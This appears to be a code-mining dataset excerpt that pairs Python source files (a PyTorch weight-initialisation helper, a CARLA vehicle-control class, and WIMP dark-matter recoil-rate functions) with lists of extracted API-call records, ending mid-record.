[((1689, 1736), 'zope.interface.implementer', 'implementer', (['IOpenCLUnit', 'ICUDAUnit', 'INumpyUnit'], {}), '(IOpenCLUnit, ICUDAUnit, INumpyUnit)\n', (1700, 1736), False, 'from zope.interface import implementer\n'), ((3993, 4000), 'veles.memory.Array', 'Array', ([], {}), '()\n', (3998, 4000), False, 'from veles.memory import Array\n'), ((8909, 8941), 'numpy.ones', 'numpy.ones', (['(1)'], {'dtype': 'self._dtype'}), '(1, dtype=self._dtype)\n', (8919, 8941), False, 'import numpy\n'), ((8965, 8998), 'numpy.zeros', 'numpy.zeros', (['(1)'], {'dtype': 'self._dtype'}), '(1, dtype=self._dtype)\n', (8976, 8998), False, 'import numpy\n'), ((9023, 9056), 'numpy.zeros', 'numpy.zeros', (['(1)'], {'dtype': 'numpy.int64'}), '(1, dtype=numpy.int64)\n', (9034, 9056), False, 'import numpy\n'), ((9090, 9136), 'veles.ocl_blas.OCLBLAS.attach_to_device', 'ocl_blas.OCLBLAS.attach_to_device', (['self.device'], {}), '(self.device)\n', (9123, 9136), True, 'import veles.ocl_blas as ocl_blas\n'), ((6436, 6480), 'numpy.zeros', 'numpy.zeros', (['output_shape'], {'dtype': 'self._dtype'}), '(output_shape, dtype=self._dtype)\n', (6447, 6480), False, 'import numpy\n'), ((7091, 7135), 'numpy.zeros', 'numpy.zeros', (['output_shape'], {'dtype': 'numpy.int32'}), '(output_shape, dtype=numpy.int32)\n', (7102, 7135), False, 'import numpy\n'), ((5687, 5699), 'veles.compat.from_none', 'from_none', (['e'], {}), '(e)\n', (5696, 5699), False, 'from veles.compat import from_none\n'), ((7192, 7216), 'numpy.prod', 'numpy.prod', (['output_shape'], {}), '(output_shape)\n', (7202, 7216), False, 'import numpy\n'), ((10234, 10263), 'numpy.ceil', 'numpy.ceil', (['(size / block_size)'], {}), '(size / block_size)\n', (10244, 10263), False, 'import numpy\n'), ((10484, 10525), 'numpy.ceil', 'numpy.ceil', (['(self.output.size / block_size)'], {}), '(self.output.size / block_size)\n', (10494, 10525), False, 'import numpy\n')]
# @Author: <NAME> <narsi> # @Date: 2018-11-12T14:06:36-06:00 # @Last modified by: narsi # @Last modified time: 2019-01-27T20:55:47-06:00 import numpy as np import torch import torch.nn as nn import torch.nn.init as init ''' https://gist.github.com/jeasinema/ed9236ce743c8efaf30fa2ff732749f5 ''' def weight_init(m): ''' Usage: model = Model() model.apply(weight_init) ''' if isinstance(m, nn.Conv1d): init.normal(m.weight.data) try: init.normal(m.bias.data) except: pass elif isinstance(m, nn.Conv2d): init.xavier_uniform_(m.weight.data , gain=np.sqrt(2)) try: init.constant_(m.bias.data, 0) except: pass elif isinstance(m, nn.Conv3d): init.xavier_uniform_(m.weight.data , gain=np.sqrt(2)) try: init.normal(m.bias.data) except: pass elif isinstance(m, nn.ConvTranspose1d): init.normal(m.weight.data) try: init.normal(m.bias.data) except: pass elif isinstance(m, nn.ConvTranspose2d): init.xavier_uniform_(m.weight.data , gain=np.sqrt(2)) try: init.normal(m.bias.data) except: pass elif isinstance(m, nn.ConvTranspose3d): init.xavier_uniform_(m.weight.data , gain=np.sqrt(2)) try: init.normal(m.bias.data) except: pass elif isinstance(m, nn.BatchNorm1d): init.constant_(m.weight.data, 1) try: init.constant_(m.bias.data, 0) except: pass elif isinstance(m, nn.BatchNorm2d): try: init.constant_(m.weight.data, 1) except: pass try: init.constant_(m.bias.data, 0) except: pass elif isinstance(m, nn.BatchNorm3d): init.constant_(m.weight.data, 1) try: init.constant_(m.bias.data, 0) except: pass elif isinstance(m, nn.Linear): init.xavier_uniform_(m.weight.data , gain=np.sqrt(2)) try: init.constant_(m.bias.data, 0) except: pass elif isinstance(m, nn.LSTM): for param in m.parameters(): if len(param.shape) >= 2: init.orthogonal(param.data) else: init.normal(param.data) elif isinstance(m, nn.LSTMCell): for param in m.parameters(): if len(param.shape) >= 2: init.orthogonal(param.data) else: init.normal(param.data) elif isinstance(m, nn.GRU): for param in m.parameters(): if len(param.shape) >= 2: init.orthogonal(param.data) else: init.normal(param.data) elif isinstance(m, nn.GRUCell): for param in m.parameters(): if len(param.shape) >= 2: init.orthogonal(param.data) else: init.normal(param.data) if __name__ == '__main__': pass
[ "torch.nn.init.normal", "torch.nn.init.constant_", "torch.nn.init.orthogonal", "numpy.sqrt" ]
[((445, 471), 'torch.nn.init.normal', 'init.normal', (['m.weight.data'], {}), '(m.weight.data)\n', (456, 471), True, 'import torch.nn.init as init\n'), ((497, 521), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (508, 521), True, 'import torch.nn.init as init\n'), ((677, 707), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (691, 707), True, 'import torch.nn.init as init\n'), ((640, 650), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (647, 650), True, 'import numpy as np\n'), ((863, 887), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (874, 887), True, 'import torch.nn.init as init\n'), ((973, 999), 'torch.nn.init.normal', 'init.normal', (['m.weight.data'], {}), '(m.weight.data)\n', (984, 999), True, 'import torch.nn.init as init\n'), ((826, 836), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (833, 836), True, 'import numpy as np\n'), ((1025, 1049), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1036, 1049), True, 'import torch.nn.init as init\n'), ((1214, 1238), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1225, 1238), True, 'import torch.nn.init as init\n'), ((1177, 1187), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (1184, 1187), True, 'import numpy as np\n'), ((1403, 1427), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1414, 1427), True, 'import torch.nn.init as init\n'), ((1509, 1541), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1523, 1541), True, 'import torch.nn.init as init\n'), ((1366, 1376), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (1373, 1376), True, 'import numpy as np\n'), ((1567, 1597), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1581, 1597), True, 'import torch.nn.init as init\n'), ((1696, 1728), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1710, 1728), True, 'import torch.nn.init as init\n'), ((1787, 1817), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1801, 1817), True, 'import torch.nn.init as init\n'), ((1899, 1931), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1913, 1931), True, 'import torch.nn.init as init\n'), ((1957, 1987), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1971, 1987), True, 'import torch.nn.init as init\n'), ((2143, 2173), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (2157, 2173), True, 'import torch.nn.init as init\n'), ((2106, 2116), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (2113, 2116), True, 'import numpy as np\n'), ((2331, 2358), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2346, 2358), True, 'import torch.nn.init as init\n'), ((2393, 2416), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2404, 2416), True, 'import torch.nn.init as init\n'), ((2545, 2572), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2560, 2572), True, 'import torch.nn.init as init\n'), ((2607, 2630), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2618, 2630), True, 'import torch.nn.init as init\n'), ((2754, 2781), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2769, 2781), True, 'import torch.nn.init as init\n'), ((2816, 2839), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2827, 2839), True, 'import torch.nn.init as init\n'), ((2967, 2994), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2982, 2994), True, 'import torch.nn.init as init\n'), ((3029, 3052), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (3040, 3052), True, 'import torch.nn.init as init\n')]
import carla from __init__ import client, world from TB_common_functions import wraptopi, calculateDistance, AgentColourToRGB from path_planner_suite import astar_search, find_nearest from shapely.geometry import LineString import math import numpy as np import matplotlib.pyplot as plt class vehicle_manual(): def __init__(self): self.client = client self.world = world self.blueprint_library = self.world.get_blueprint_library() self.vehicle_blueprint = self.blueprint_library.filter("vehicle.mercedes-benz.coupe")[0] self.vehicle_blueprint.set_attribute('color', AgentColourToRGB("yellow")) def spawn(self,x,y,z,yaw): self.actor_list = [] self.spawn_orientation = yaw self.transform = carla.Transform(carla.Location(x=float(x), y=float(y), z=float(z)), carla.Rotation(yaw=float(self.spawn_orientation))) self.agent = self.world.spawn_actor(self.vehicle_blueprint, self.transform) self.world.tick() # important to tick after spawning, otherwise actor details not reachable self.actor_list.append(self.agent) self.spawn_point_x = x self.spawn_point_y = y self.spawn_point_z = z self.spawn_point_yaw = yaw self.agentID = self.agent.id self.agentType = self.agent.type_id pass def step(self): pass def Update_state_info(self): agent_transform = self.agent.get_transform() agent_location = agent_transform.location agent_rotation = agent_transform.rotation agent_velocity = self.agent.get_velocity() # This is an object vector self.current_t = self.world_snapshot.timestamp.elapsed_seconds #ts.elapsed_seconds - start_of_simulation_timestamp self.current_x = agent_location.x self.current_y = agent_location.y self.current_z = agent_location.z self.current_yaw = wraptopi(math.radians(agent_rotation.yaw)) self.current_velocity = np.array([agent_velocity.x, agent_velocity.y, agent_velocity.z]) # This is an array as opposed to agent_velocity, which is an object self.current_speed = np.sqrt(self.current_velocity.dot(self.current_velocity)) def get_pos(self): self.Update_state_info() self.pos_array = [self.current_x, self.current_y, self.current_z, self.current_yaw] return self.pos_array def destroy(self): self.agent.destroy() pass def send_control(self, throttle, steer, brake, hand_brake=False, reverse=False): self.control = carla.VehicleControl() # Clamp all values within their limits steer = np.fmax(np.fmin(steer, 1.0), -1.0) throttle = np.fmax(np.fmin(throttle, 1.0), -1.0) brake = np.fmax(np.fmin(brake, 1.0), -1.0) self.control.steer = steer self.control.throttle = throttle self.control.brake = brake self.control.hand_brake = hand_brake self.control.reverse = reverse self.agent.apply_control(self.control)
[ "numpy.fmin", "TB_common_functions.AgentColourToRGB", "math.radians", "numpy.array", "carla.VehicleControl" ]
[((2012, 2076), 'numpy.array', 'np.array', (['[agent_velocity.x, agent_velocity.y, agent_velocity.z]'], {}), '([agent_velocity.x, agent_velocity.y, agent_velocity.z])\n', (2020, 2076), True, 'import numpy as np\n'), ((2556, 2578), 'carla.VehicleControl', 'carla.VehicleControl', ([], {}), '()\n', (2576, 2578), False, 'import carla\n'), ((581, 607), 'TB_common_functions.AgentColourToRGB', 'AgentColourToRGB', (['"""yellow"""'], {}), "('yellow')\n", (597, 607), False, 'from TB_common_functions import wraptopi, calculateDistance, AgentColourToRGB\n'), ((1937, 1969), 'math.radians', 'math.radians', (['agent_rotation.yaw'], {}), '(agent_rotation.yaw)\n', (1949, 1969), False, 'import math\n'), ((2658, 2677), 'numpy.fmin', 'np.fmin', (['steer', '(1.0)'], {}), '(steer, 1.0)\n', (2665, 2677), True, 'import numpy as np\n'), ((2722, 2744), 'numpy.fmin', 'np.fmin', (['throttle', '(1.0)'], {}), '(throttle, 1.0)\n', (2729, 2744), True, 'import numpy as np\n'), ((2789, 2808), 'numpy.fmin', 'np.fmin', (['brake', '(1.0)'], {}), '(brake, 1.0)\n', (2796, 2808), True, 'import numpy as np\n')]
#===============================WIMPFuncs.py===================================# # Created by <NAME> 2020 # Contains all the functions for doing the WIMPy calculations #==============================================================================# import numpy as np from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid from numpy import nan, isnan, column_stack, amin, amax from numpy.linalg import norm from scipy.special import erf from scipy.spatial import ConvexHull import LabFuncs import Params from Params import m_p_keV, c_km, seconds2year, m_p_kg, GeV_2_kg, c_cm, Jan1 #==============================================================================# #-------------------- Energy-Time dependent recoil rate------------------------# #---------------------------------- v_min -------------------------------------# def MinimumWIMPSpeed(E_r,A,m_chi,delta=0): # E_r = recoil energy in keVr # A = nucleus mass number # m_chi = Wimp mass in GeV # delta = for inelastic scattering mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV) # reduced proton mass m_N_keV = A*m_p_keV # nucleus mass in keV mu_N_keV = 1.0e6*m_chi*m_N_keV/(1.0e6*m_chi + m_N_keV) # reduced nucleus mass v_min = sqrt(1.0/(2*m_N_keV*E_r))*(m_N_keV*E_r/mu_N_keV + delta)*c_km return v_min #---------------------------------- E_max -------------------------------------# def MaxWIMPEnergy(A,m_chi,\ v_lab=LabFuncs.LabVelocitySimple(67.0),v_esc=Params.SHM.EscapeSpeed): # A = nucleus mass number # v_lab = Lab velocity in km/s # m_chi = Wimp mass in GeV # v_esc = Escape speed in km/s m_N = m_p_keV*A mu_N = 1.0e6*m_N*m_chi/(1.0e6*m_chi+m_N) E_max_lim = 2.0*mu_N*mu_N*2.0*((v_esc+sqrt(sum(v_lab**2.0)))/c_km)**2.0/m_N return E_max_lim #----------------------General event rate -------------------------------------# def R_wimp(E_th,E_max,m_chi,sigma_p=1.0e-45,\ Nuc=Params.Ar40,Loc=Params.GranSasso,\ HaloModel=Params.SHM,eff_on=False,eres_on=False): nfine = 1000 Efine = logspace(-3.0,log10(200.0),nfine) DM = Params.WIMP(m_chi,sigma_p) # Calculate rate at day=67 to get ~average dR = dRdE_wimp(Efine,array([(Jan1+67.0)]),DM,HaloModel,Nuc,Loc) # Correct for efficiency if eff_on: dR *= LabFuncs.efficiency(Nuc,Efine) # Smear by energy resolution # if eres_on: # dR = SmearE(Efine,dR,energyresolution(Nuc,Efine)) # Window mask = (Efine<E_max)&(Efine>E_th) R = trapz(dR[mask],Efine[mask]) return R #-------------------- Energy dependent recoil rate-----------------------------# def dRdE_wimp(E_r,t,DM,\ HaloModel=Params.SHM,Nuc=Params.Ar40,Loc=Params.GranSasso): # relevant constants A = Nuc.MassNumber # mass number of nucleus m_chi = DM.Mass mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV) sigma_p = DM.SICrossSection v_0 = sqrt(2.0)*HaloModel.Dispersion v_esc = HaloModel.EscapeSpeed rho_0 = HaloModel.Density N_esc = HaloModel.Normalisation FF = LabFuncs.FormFactorHelm(E_r,A)**2.0 v_min = MinimumWIMPSpeed(E_r,A,m_chi) R0 = (c_cm*c_cm)*((rho_0*1.0e6*A*A*sigma_p)/(2*m_chi*GeV_2_kg*mu_p*mu_p)) # init ne = size(E_r) nt = size(t) dR = zeros(shape=ne) gvmin = zeros(ne) # Mean inverse speed x = v_min/v_0 z = v_esc/v_0 if t[0] == t[-1]: v_e = norm(LabFuncs.LabVelocity(t[0], Loc, HaloModel.RotationSpeed)) y = v_e/v_0 gvmin[(x<abs(y-z))&(z<y)] = (1.0/(v_0*y)) else: v_e = zeros(shape=ne) for i in range(0,nt): v_e[i] = norm(LabFuncs.LabVelocity(t[i], Loc, HaloModel.RotationSpeed)) y = v_e/v_0 g1 = (1.0/(v_0*y)) gvmin[(x<abs(y-z))&(z<y)] = g1[(x<abs(y-z))&(z<y)] g2 = (1.0/(2.0*N_esc*v_0*y))*(erf(x+y)-erf(x-y)-(4.0/sqrt(pi))*y*exp(-z**2)) g3 = (1.0/(2.0*N_esc*v_0*y))*(erf(z)-erf(x-y)-(2.0/sqrt(pi))*(y+z-x)*exp(-z**2)) gvmin[(x<abs(y-z))&(z>y)] = g2[(x<abs(y-z))&(z>y)] gvmin[(abs(y-z)<x)&(x<(y+z))] = g3[(abs(y-z)<x)&(x<(y+z))] gvmin[(y+z)<x] = 0.0 gvmin = gvmin/(1000.0*100.0) # convert to cm^-1 s # Compute rate = (Rate amplitude * gmin * form factor) dR = R0*gvmin*FF dR = dR*seconds2year*1000.0 # convert to per ton-year return dR #-------------------- Direction dependent recoil rate--------------------------# def dRdEdO_wimp(E,t,DM,HaloModel=Params.SHM,Nuc=Params.Ar40,\ Loc=Params.GranSasso,CygnusTracking=False): E_r = sqrt(E[:,0]**2 + E[:,1]**2 + E[:,2]**2) # Recoil energy x = zeros(shape=shape(E)) x[:,0] = E[:,0]/E_r # Recoil direction x[:,1] = E[:,1]/E_r x[:,2] = E[:,2]/E_r # relevant constants A = Nuc.MassNumber # mass number of nucleus m_chi = DM.Mass mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV) sigma_p = DM.SICrossSection sig_v = HaloModel.Dispersion v_esc = HaloModel.EscapeSpeed rho_0 = HaloModel.Density N_esc = HaloModel.Normalisation FF = LabFuncs.FormFactorHelm(E_r,A)**2.0 v_min = MinimumWIMPSpeed(E_r,A,m_chi) R0 = (c_cm*c_cm)*((rho_0*1.0e6*A*A*sigma_p)/(4*pi*m_chi*GeV_2_kg*mu_p*mu_p)) # Calculate v_lab ne = size(E_r) nt = size(t) dR = zeros(shape=(size(E_r))) v_lab = zeros(shape=(size(E_r),3)) for i in range(0,nt): v_lab[i,:] = LabFuncs.LabVelocity(t[i], Loc, HaloModel.RotationSpeed) # Just put vlab towards north pole for cygnus tracking experiment: if CygnusTracking==True: for i in range(0,nt): v_lab[i,:] = array([0.0,0.0,sqrt(sum(v_lab[i,:]**2.0))]) # recoil projection vlabdotq = (x[:,0]*v_lab[:,0]+x[:,1]*v_lab[:,1]+x[:,2]*v_lab[:,2]) # Radon transform fhat = zeros(shape=shape(E_r)) fhat[((v_min+vlabdotq)<(v_esc))] = (1/(N_esc*sqrt(2*pi*sig_v**2.0)))\ *(exp(-(v_min[((v_min+vlabdotq)<(v_esc))]\ +vlabdotq[((v_min+vlabdotq)<(v_esc))])\ **2.0/(2*sig_v**2.0))\ -exp(-v_esc**2.0/(2*sig_v**2.0))) fhat = fhat/(1000.0*100.0) # convert to cm^-1 s # Compute rate = (Rate amplitude * radon trans. * form factor) dR = R0*fhat*FF # correct for form factor dR = dR*seconds2year*1000.0 # convert to per ton-year return dR #------------ 1-dimensional direction dependent recoil rate--------------------# def dRdEdcosth_wimp(m_chi,t1,costh_vals,E_r_vals,\ Nuc=Params.Ar40,\ Loc=Params.GranSasso,\ sigma_p=1.0e-45,\ HaloModel=Params.SHM,\ np=20,\ CygnusTracking=False,\ ndims=2, HT=False): DM = Params.WIMP(m_chi,sigma_p) ph = linspace(-pi, pi-(2*pi/(1.0*np)), np) E1 = zeros(shape=(np,3)) E2 = zeros(shape=(np,3)) if ndims==1: n = size(costh_vals) dR = zeros(shape=(n)) for i in range(0,n): costh = costh_vals[i] E_r = E_r_vals[i] E1[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0) E1[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0) E1[:,2] = E_r*costh E2[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0) E2[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0) E2[:,2] = -1.0*E_r*costh dR[i] = trapz(dRdEdO_wimp(E1,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)\ +dRdEdO_wimp(E2,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking),ph) elif ndims==2: # 2D ne = size(E_r_vals) nc = size(costh_vals) dR = zeros(shape=(nc,ne)) for i in range(0,nc): costh = costh_vals[i] for j in range(0,ne): E_r = E_r_vals[j] E1[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0) E1[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0) E1[:,2] = E_r*costh dR[i,j] = trapz(dRdEdO_wimp(E1,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)) if HT==False: for i in range(0,nc): costh = costh_vals[i] for j in range(0,ne): E_r = E_r_vals[j] E2[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0) E2[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0) E2[:,2] = -1.0*E_r*costh dR[i,j] += trapz(dRdEdO_wimp(E2,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)) return dR def R_Ecosth_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,nc=50,\ Nuc=Params.Ar40,\ Loc=Params.GranSasso,\ sigma_p=1.0e-45,\ HaloModel=Params.SHM,\ np=20,\ CygnusTracking=False, HT=False): E_r_edges = linspace(E_min,E_max,ne+1) costh_edges = linspace(0.0,1.0,nc+1) E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0 costh_centers = (costh_edges[1:]+costh_edges[0:-1])/2.0 dR = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges,Nuc=Nuc,\ CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=2,HaloModel=HaloModel,HT=HT) [X,Y] = meshgrid(E_r_edges,costh_edges) dX = X[1:,1:]-X[1:,0:-1] dY = Y[1:,1:]-Y[0:-1,1:] R = 0.5*0.5*dX*dY*(dR[1:,1:]+dR[1:,0:-1]+dR[0:-1,1:]+dR[0:-1,0:-1]) return E_r_centers,costh_centers,R def R_Ecosth2_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,\ Nuc=Params.Ar40,\ Loc=Params.GranSasso,\ sigma_p=1.0e-45,\ HaloModel=Params.SHM,\ np=20,\ CygnusTracking=False): nc_fine = 300 E_r_edges = linspace(E_min,E_max,ne+1) S_edges = linspace(0.0,1.0,ne+1) costh_edges = linspace(0.0,1.0,nc_fine+1) costh_centers = (costh_edges[1:]+costh_edges[0:-1])/2.0 E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0 S_centers = (S_edges[1:]+S_edges[0:-1])/2.0 dE = E_r_edges[1]-E_r_edges[0] R = zeros(shape=(ne,ne)) # dRf1 = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges[0]*ones(shape=nc_fine+1),Nuc=Nuc,\ # CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=1) # for i in range(0,ne): # dRf2 = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges[i+1]*ones(shape=nc_fine+1),Nuc=Nuc,\ # CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=1) # for k in range(0,ne): # dcosth = sqrt(S_edges[i+1]/A_CR)-sqrt(S_edges[i]/A_CR) # mask = (costh_edges<sqrt(S_edges[k+1]/A_CR))*(costh_edges>sqrt(S_edges[k]/A_CR)) # R[k,i] = 0.5*dE*(trapz(dRf1[mask],costh_edges[mask])\ # +trapz(dRf2[mask],costh_edges[mask])) # dRf1 = 1.0*dRf2 for i in range(0,ne): if S_edges[i]<=A_CR: for j in range(0,ne): efine = linspace(E_r_edges[j],E_r_edges[j+1],5) smin = S_edges[i] smax = min(S_edges[i+1],A_CR) cfine = linspace(sqrt(smin/A_CR),sqrt(smax/A_CR),5) R[i,j] = trapz(trapz(dRdEdcosth_wimp(m_chi,t1,cfine,efine,Nuc=Nuc,HaloModel=HaloModel,\ CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=2),cfine),efine) return E_r_centers,S_centers,R def R_IS_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=20,\ Nuc=Params.Ar40,\ Loc=Params.GranSasso,\ sigma_p=1.0e-45,\ HaloModel=Params.SHM,\ np=20,\ CygnusTracking=False): E_o_edges = linspace(E_min,E_max,ne+1) E_o_centers = (E_o_edges[1:]+E_o_edges[0:-1])/2.0 [I,S] = meshgrid(E_o_edges,E_o_edges) C = sqrt((1.0/A_CR)*1.0/(I/S+1)) E = S+I dR = zeros(shape=shape(C)) for i in range(0,ne+1): mask = (C[i,:]<=1)&(E[i,:]<E_max) costh_vals = C[i,mask] E_r_vals = E[i,mask] dR[i,mask] = dRdEdcosth_wimp(m_chi,t1,costh_vals,E_r_vals,Nuc=Nuc,\ CygnusTracking=CygnusTracking,\ sigma_p=sigma_p,\ np=np,ndims=1,HaloModel=HaloModel) R = zeros(shape=(ne,ne)) for i in range(0,ne): for j in range(0,ne): x = array([E[i,j],E[i,j+1],E[i+1,j],E[i+1,j+1], E[i,j],E[i,j+1],E[i+1,j],E[i+1,j+1]]) y = array([C[i,j],C[i,j+1],C[i+1,j],C[i+1,j+1], C[i,j],C[i,j+1],C[i+1,j],C[i+1,j+1]]) z = array([0,0,0,0, dR[i,j],dR[i,j+1],dR[i+1,j],dR[i+1,j+1]]) if any(z>0): points = column_stack((x,y,z)) R[i,j] = ConvexHull(points,qhull_options='W1e-15 E1e-15').volume return E_o_centers,R # def R_Ecosth2_wimp_alt(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,\ # Nuc=Params.Ar40,\ # Loc=Params.GranSasso,\ # sigma_p=1.0e-45,\ # HaloModel=Params.SHM,\ # nside=8,\ # CygnusTracking=False): # DM = Params.WIMP(m_chi,sigma_p) # E_r_edges = linspace(E_min,E_max,ne+1) # S_edges = linspace(0.0,1.0,ne+1) # E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0 # S_centers = (S_edges[1:]+S_edges[0:-1])/2.0 # # Healpix discretisation of a sphere # npix = 12*nside**2 # dpix = 4*pi/(npix*1.0) # x_pix = zeros(shape=(npix,3)) # for i in range(0,npix): # x_pix[i,:] = hp.pix2vec(nside, i) # t1 = t1*ones(shape=npix) # costh = x_pix[:,2] # dE = E_r_edges[1]-E_r_edges[0] # R = zeros(shape=(ne,ne)) # dRf1 = dpix*dRdEdO_wimp(E_r_edges[0]*x_pix,t1,DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking) # for i in range(0,ne): # dRf2 = dpix*dRdEdO_wimp(E_r_edges[i]*x_pix,t1,DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking) # for k in range(0,ne): # mask = (abs(costh)<sqrt(S_edges[k+1]/A_CR))*(abs(costh)>sqrt(S_edges[k]/A_CR)) # R[k,i] = 0.5*dE*(sum(dRf1[mask])+sum(dRf2[mask])) # dRf1 = 1.0*dRf2 # return E_r_centers,S_centers,R
[ "LabFuncs.LabVelocity", "numpy.ones", "numpy.shape", "numpy.sin", "numpy.exp", "LabFuncs.LabVelocitySimple", "numpy.meshgrid", "LabFuncs.efficiency", "numpy.linspace", "LabFuncs.FormFactorHelm", "numpy.log10", "numpy.trapz", "numpy.size", "scipy.special.erf", "Params.WIMP", "numpy.cos", "scipy.spatial.ConvexHull", "numpy.zeros", "numpy.array", "numpy.column_stack", "numpy.sqrt" ]
[((1528, 1560), 'LabFuncs.LabVelocitySimple', 'LabFuncs.LabVelocitySimple', (['(67.0)'], {}), '(67.0)\n', (1554, 1560), False, 'import LabFuncs\n'), ((2213, 2240), 'Params.WIMP', 'Params.WIMP', (['m_chi', 'sigma_p'], {}), '(m_chi, sigma_p)\n', (2224, 2240), False, 'import Params\n'), ((2618, 2646), 'numpy.trapz', 'trapz', (['dR[mask]', 'Efine[mask]'], {}), '(dR[mask], Efine[mask])\n', (2623, 2646), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((3351, 3360), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (3355, 3360), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3370, 3377), 'numpy.size', 'size', (['t'], {}), '(t)\n', (3374, 3377), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3387, 3402), 'numpy.zeros', 'zeros', ([], {'shape': 'ne'}), '(shape=ne)\n', (3392, 3402), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3415, 3424), 'numpy.zeros', 'zeros', (['ne'], {}), '(ne)\n', (3420, 3424), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4653, 4701), 'numpy.sqrt', 'sqrt', (['(E[:, 0] ** 2 + E[:, 1] ** 2 + E[:, 2] ** 2)'], {}), '(E[:, 0] ** 2 + E[:, 1] ** 2 + E[:, 2] ** 2)\n', (4657, 4701), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5344, 5353), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5348, 5353), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5363, 5370), 'numpy.size', 'size', (['t'], {}), '(t)\n', (5367, 5370), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6951, 6978), 'Params.WIMP', 'Params.WIMP', (['m_chi', 'sigma_p'], {}), '(m_chi, sigma_p)\n', (6962, 6978), False, 'import Params\n'), ((6987, 7030), 'numpy.linspace', 'linspace', (['(-pi)', '(pi - 2 * pi / (1.0 * np))', 'np'], {}), '(-pi, pi - 2 * pi / (1.0 * np), np)\n', (6995, 7030), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7034, 7054), 'numpy.zeros', 'zeros', ([], {'shape': '(np, 3)'}), '(shape=(np, 3))\n', (7039, 7054), False, 